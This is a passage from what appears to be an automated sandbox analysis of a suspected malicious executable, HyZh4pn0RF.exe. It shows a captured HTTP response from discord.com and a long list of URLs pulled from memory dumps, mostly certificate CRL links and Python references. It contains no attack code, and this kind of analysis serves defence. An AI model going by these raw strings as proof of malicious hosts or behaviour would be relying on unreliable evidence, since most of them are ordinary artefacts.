Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 27 Sep 2024 16:19:27 GMTContent-Type: application/jsonContent-Length: 45Connection: closeset-cookie: __dcfduid=4487f5667cec11ef93fb42324cf1d653; Expires=Wed, 26-Sep-2029 16:19:27 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Laxstrict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1727453968x-ratelimit-reset-after: 1via: 1.1 googlealt-svc: h3=":443"; ma=86400CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LvdxsnH3VeoqPUjoomoUuU5c8X4zgMRKqnXawrANMhKwi6hhMdo5016rsX9NCYa6wykIQqKlxIU8ADnLaK42CVTwRiVl9J9124eWt428wUlCxaHoTqN9SAmm7D34"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: __sdcfduid=4487f5667cec11ef93fb42324cf1d653bd54605707d20d5da4787f34f71b3a8d76e986fb5ce1476f20fea179a32ef6d4; Expires=Wed, 26-Sep-2029 16:19:27 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=LaxSet-Cookie: __cfruid=dff45fc3a172b052c868c8c498e3328f5153195d-1727453967; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None

Source: HyZh4pn0RF.exe, 00000002.00000002.1826914311.000002539BBFC000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://.../back.jpeg
Source: HyZh4pn0RF.exe, 00000002.00000002.1823958561.000002539ACF0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://aka.ms/vcpython27
Source: HyZh4pn0RF.exe, 00000002.00000002.1823958561.000002539ACF0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://aka.ms/vcpython27P
Source: HyZh4pn0RF.exe, 00000002.00000002.1825189021.000002539B2E2000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1809054810.000002539B2CE000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1788652033.000002539B2CE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://blog.cryptographyengineering.com/2012/05/how-to-choose-authent
Source: HyZh4pn0RF.exe, 00000002.00000003.1786935489.000002539A8B2000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1807654238.000002539A382000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1812235120.000002539A9DC000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1790955383.000002539A34C000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1793434238.000002539A5FB000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1788652033.000002539B2FE000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1811309519.000002539A5FD000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1811817866.000002539A5FD000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000002.1821619779.000002539A5FD000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1786935489.000002539A717000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1812755836.000002539B1B2000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1809487444.000002539B1AF000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1809347262.000002539A730000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1788235967.000002539A2D4000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1787535604.000002539A8D2000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1791039518.000002539B1A5000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1805946201.000002539A5FC000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000002.1823050283.000002539A927000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1787506333.000002539A9D6000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1786519721.000002539A996000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1790429949.000002539A2FD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://blog.cryptographyengineering.com/2012/05/how-to-choose-authenticated-encryption.html
Source: HyZh4pn0RF.exe, 00000000.00000003.1483757328.0000027ADD238000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRoot
Source: HyZh4pn0RF.exe, 00000000.00000003.1470563182.0000027ADD237000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000000.00000003.1477126962.0000027ADD238000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000000.00000003.1470135236.0000027ADD237000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000000.00000003.1470434646.0000027ADD237000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000000.00000003.1470563182.0000027ADD243000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000000.00000003.1470060822.0000027ADD237000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000000.00000003.1469946066.0000027ADD237000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000000.00000003.1474540160.0000027ADD238000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000000.00000003.1470258867.0000027ADD237000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000000.00000003.1472558393.0000027ADD238000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000000.00000003.1475480253.0000027ADD238000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000000.00000003.1469455795.0000027ADD237000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000000.00000003.1472558393.0000027ADD244000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000000.00000003.1484383476.0000027ADD238000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000000.00000003.1469859239.0000027ADD237000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000000.00000003.1469009173.0000027ADD237000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000000.00000003.1483438477.0000027ADD238000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000000.00000003.1469615826.0000027ADD237000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000000.00000003.1475801441.0000027ADD238000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000000.00000003.1469300025.0000027ADD237000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000000.00000003.1468851780.0000027ADD237000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: HyZh4pn0RF.exe, 00000000.00000003.1470563182.0000027ADD237000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000000.00000003.1477126962.0000027ADD238000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000000.00000003.1470135236.0000027ADD237000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000000.00000003.1470434646.0000027ADD237000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000000.00000003.1470060822.0000027ADD237000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000000.00000003.1469946066.0000027ADD237000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000000.00000003.1474540160.0000027ADD238000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000000.00000003.1470258867.0000027ADD237000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000000.00000003.1472558393.0000027ADD238000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000000.00000003.1475480253.0000027ADD238000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000000.00000003.1483757328.0000027ADD238000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000000.00000003.1469455795.0000027ADD237000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000000.00000003.1484383476.0000027ADD238000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000000.00000003.1469859239.0000027ADD237000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000000.00000003.1469009173.0000027ADD237000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000000.00000003.1483438477.0000027ADD238000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000000.00000003.1469615826.0000027ADD237000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000000.00000003.1475801441.0000027ADD238000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000000.00000003.1469300025.0000027ADD237000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000000.00000003.1468851780.0000027ADD237000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000000.00000003.1469737334.0000027ADD237000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: HyZh4pn0RF.exe, 00000000.00000003.1470563182.0000027ADD237000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000000.00000003.1477126962.0000027ADD238000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000000.00000003.1470135236.0000027ADD237000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000000.00000003.1470434646.0000027ADD237000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000000.00000003.1470060822.0000027ADD237000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000000.00000003.1469946066.0000027ADD237000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000000.00000003.1474540160.0000027ADD238000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000000.00000003.1470258867.0000027ADD237000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000000.00000003.1472558393.0000027ADD238000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000000.00000003.1475480253.0000027ADD238000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000000.00000003.1483757328.0000027ADD238000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000000.00000003.1469455795.0000027ADD237000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000000.00000003.1484383476.0000027ADD238000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000000.00000003.1469859239.0000027ADD237000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000000.00000003.1469009173.0000027ADD237000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000000.00000003.1483438477.0000027ADD238000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000000.00000003.1469615826.0000027ADD237000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000000.00000003.1475801441.0000027ADD238000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000000.00000003.1469300025.0000027ADD237000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000000.00000003.1468851780.0000027ADD237000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000000.00000003.1469737334.0000027ADD237000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: HyZh4pn0RF.exe, 00000000.00000003.1470563182.0000027ADD237000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000000.00000003.1477126962.0000027ADD238000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000000.00000003.1470135236.0000027ADD237000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000000.00000003.1470434646.0000027ADD237000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000000.00000003.1470563182.0000027ADD243000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000000.00000003.1470060822.0000027ADD237000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000000.00000003.1469946066.0000027ADD237000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000000.00000003.1474540160.0000027ADD238000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000000.00000003.1470258867.0000027ADD237000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000000.00000003.1472558393.0000027ADD238000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000000.00000003.1475480253.0000027ADD238000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000000.00000003.1483757328.0000027ADD238000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000000.00000003.1469455795.0000027ADD237000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000000.00000003.1472558393.0000027ADD244000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000000.00000003.1484383476.0000027ADD238000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000000.00000003.1469859239.0000027ADD237000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000000.00000003.1469009173.0000027ADD237000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000000.00000003.1483438477.0000027ADD238000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000000.00000003.1469615826.0000027ADD237000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000000.00000003.1475801441.0000027ADD238000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000000.00000003.1469300025.0000027ADD237000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: HyZh4pn0RF.exe, 00000002.00000003.1493090352.000002539A68F000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1494518029.000002539A68F000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1492436401.000002539A68F000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1498180126.000002539A68F000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1492182881.000002539A688000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1791917886.000002539A690000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1494266364.000002539A336000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1788235967.000002539A2D4000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1790148571.000002539A679000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1791039518.000002539B1A5000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1492253845.000002539A697000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000002.1822081636.000002539A698000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1790429949.000002539A2FD000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1788053282.000002539A2D2000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1791559489.000002539A33E000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1491643506.000002539A67C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://code.activestate.com/recipes/577452-a-memoize-decorator-for-instance-methods/
Source: HyZh4pn0RF.exe, 00000002.00000003.1497976070.000002539A9D2000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1808967495.000002539A9D0000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1797847362.000002539A9CB000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1500185747.000002539A9CC000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1498140465.000002539B1C5000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1497976070.000002539A987000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1786519721.000002539A996000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1787476794.000002539A9CA000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1805386780.000002539A9CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://code.activestate.com/recipes/577916/
Source: HyZh4pn0RF.exe, 00000002.00000003.1810591741.000002539B335000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1783818782.000002539B3E2000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1785442131.000002539B4DE000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1784708486.000002539B4D4000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1783499867.000002539B398000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1813019488.000002539B329000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.certigna.fr/certignarootca.crl01
Source: HyZh4pn0RF.exe, 00000002.00000003.1808967495.000002539A9D0000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1797847362.000002539A9CB000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1791477377.000002539A6C8000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1814093685.000002539A6C8000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1810530426.000002539A6C8000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000002.1822139416.000002539A6C8000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1785215448.000002539B3A1000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1785328522.000002539B43B000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1783499867.000002539B398000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1784091613.000002539B42C000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1786519721.000002539A996000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1787476794.000002539A9CA000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1805386780.000002539A9CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: HyZh4pn0RF.exe, 00000002.00000003.1786935489.000002539A8B2000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1783972353.000002539B445000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1785215448.000002539B3AB000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1784011025.000002539B3A6000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1784233244.000002539B44C000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000002.1822764348.000002539A8B2000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1790797363.000002539B453000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1786346031.000002539B453000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1785328522.000002539B44F000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1784831283.000002539B4AC000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1790850713.000002539A8B2000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1783499867.000002539B398000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1787579799.000002539A8B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/COMODOCertificationAuthority.crl
Source: HyZh4pn0RF.exe, 00000002.00000003.1786935489.000002539A8B2000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000002.1822764348.000002539A8B2000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1790850713.000002539A8B2000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1787579799.000002539A8B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/COMODOCertificationAuthority.crld
Source: HyZh4pn0RF.exe, 00000002.00000003.1810591741.000002539B335000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1783818782.000002539B3E2000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1785442131.000002539B4DE000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1784708486.000002539B4D4000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1783499867.000002539B398000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1813019488.000002539B329000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.dhimyotis.com/certignarootca.crl
Source: HyZh4pn0RF.exe, 00000002.00000003.1810591741.000002539B335000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.dhimyotis.com/certignarootca.crlp
Source: HyZh4pn0RF.exe, 00000002.00000003.1783818782.000002539B3E2000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1783499867.000002539B398000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.dhimyotis.com/certignarootca.crlp6
Source: HyZh4pn0RF.exe, 00000002.00000003.1785442131.000002539B4DE000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1784708486.000002539B4D4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.dhimyotis.com/certignarootca.crl~
Source: HyZh4pn0RF.exe, 00000002.00000003.1783972353.000002539B445000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1785675797.000002539B45C000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1784011025.000002539B3A6000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1784233244.000002539B44C000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1784136988.000002539B3AD000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1784339813.000002539B459000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1785328522.000002539B45C000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1783499867.000002539B398000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.securetrust.com/SGCA.crl
Source: HyZh4pn0RF.exe, 00000002.00000003.1784011025.000002539B3A6000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1783499867.000002539B398000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.securetrust.com/SGCA.crl0
Source: HyZh4pn0RF.exe, 00000002.00000003.1783972353.000002539B445000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1785675797.000002539B45C000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1784233244.000002539B44C000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1784339813.000002539B459000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1785328522.000002539B45C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.securetrust.com/SGCA.crlm
Source: HyZh4pn0RF.exe, 00000002.00000003.1810591741.000002539B335000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1783972353.000002539B445000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1817448631.000002539B355000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1785675797.000002539B45C000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1784233244.000002539B44C000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1784339813.000002539B459000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000002.1825548276.000002539B360000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1785328522.000002539B45C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.securetrust.com/STCA.crl
Source: HyZh4pn0RF.exe, 00000002.00000003.1784011025.000002539B3A6000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1783499867.000002539B398000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.securetrust.com/STCA.crl0
Source: HyZh4pn0RF.exe, 00000002.00000003.1810591741.000002539B335000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1783972353.000002539B445000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1817448631.000002539B355000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1785675797.000002539B45C000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1784233244.000002539B44C000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1784339813.000002539B459000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000002.1825548276.000002539B360000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1785328522.000002539B45C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl
Source: HyZh4pn0RF.exe, 00000002.00000003.1785215448.000002539B3A1000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1783499867.000002539B398000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl0
Source: HyZh4pn0RF.exe, 00000000.00000003.1470563182.0000027ADD237000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000000.00000003.1477126962.0000027ADD238000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000000.00000003.1470135236.0000027ADD237000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000000.00000003.1470434646.0000027ADD237000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000000.00000003.1470563182.0000027ADD243000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000000.00000003.1470060822.0000027ADD237000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000000.00000003.1469946066.0000027ADD237000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000000.00000003.1474540160.0000027ADD238000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000000.00000003.1470258867.0000027ADD237000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 